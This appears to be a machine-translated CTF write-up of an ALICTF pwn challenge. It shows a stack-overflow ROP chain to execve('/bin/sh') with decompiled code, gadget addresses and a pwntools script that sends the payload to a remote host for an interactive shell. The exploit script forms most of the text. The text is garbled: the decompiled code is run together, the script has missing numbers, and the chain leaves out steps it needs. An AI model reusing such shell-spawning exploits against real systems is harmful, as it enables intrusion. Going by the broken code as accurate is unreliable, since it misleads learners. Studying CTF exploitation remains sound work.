Stack overflow of ROP to Syscall

When the program opens NX, but the program has a syscall call. At this time the use of the stack overflow can be performed through ROP to execute Syscall 59th call Execve ('/bin/sh ', null,null), this is ALICTF together PWN experience.

Ida matching GDB Locator vulnerability is as follows:

signed __int64 __fastcall sub_40108e (__int64 A1) {signed __int64 result;//[email protected]__int64 v2;//[email protected]  intV3;//[sp+10h] [bp-40h]@1__int64 v4;//[sp+20h] [bp-30h]@1__int64 v5;//[sp+28h] [bp-28h]@1__int64 V6;//[sp+30h] [bp-20h]@1__int64 V7;//[sp+38h] [bp-18h]@1__int64 V8;//[sp+40h] [bp-10h]@1UnsignedintV9;//[sp+48h] [bp-8h]@7  intV10;//[sp+4ch] [bp-4h]@4V4=0LL; V5=0LL; V6=0LL; V7=0LL; V8=0LL; V3=0; sub_400330 ((__int64)&v3, A1, 80LL);//processing input, first letter py bypasses login detection, 80 bytes of last 8 bytes control ret  if((_byte) v3! = the|| BYTE1 (v3)! =121)

The ROP chain for constructing Syscall is found through Ropgadget as follows:

0x46f208 : Pop Rax;ret 0x401823 : Pop Rdi;ret 0x462873 : Pop Rcx;ret 0x422568 : mov dword ptr [RDI], ecx; RET 0x46f205 0x58   ret0x43ae29: Pop rdx;pop rsi;ret0x45f2a5:  syscall;ret

Using code:

 fromPWN Import *#io=process ('./vss') IO=remote ('114.55.103.213',2333)Praxret=0x46f208Prdiret=0x401823Prcxret=0x0000000000462873# pop RCX retmovrdircx=0x422568Addespret=0x46f205#add RSP0x58Retprdxrsiret=0x43ae29Syscallret=0x45f2a5 Pay='py'+'a'* - Pay+=P64 (Addespret) +'a'*8 #add RSP 0x58; ret          Pay+=P64 (Praxret) +p64 ( -) #pop rax;ret pay+=P64 (Prcxret) +'/bin/sh\x00'+P64 (MOVRDIRCX) #pop Rcx;ret; mov dword ptr [RDI], ecx; RET pay+=P64 (Prdxrsiret) +p64 (0) +p64 (0) #pop rdx;pop rsi;ret pay+=p64 (Syscallret) #syscall; Retio.recvuntil ('password:\n') io.sendline (pay) io.interactive ()

Stack overflow of ROP to Syscall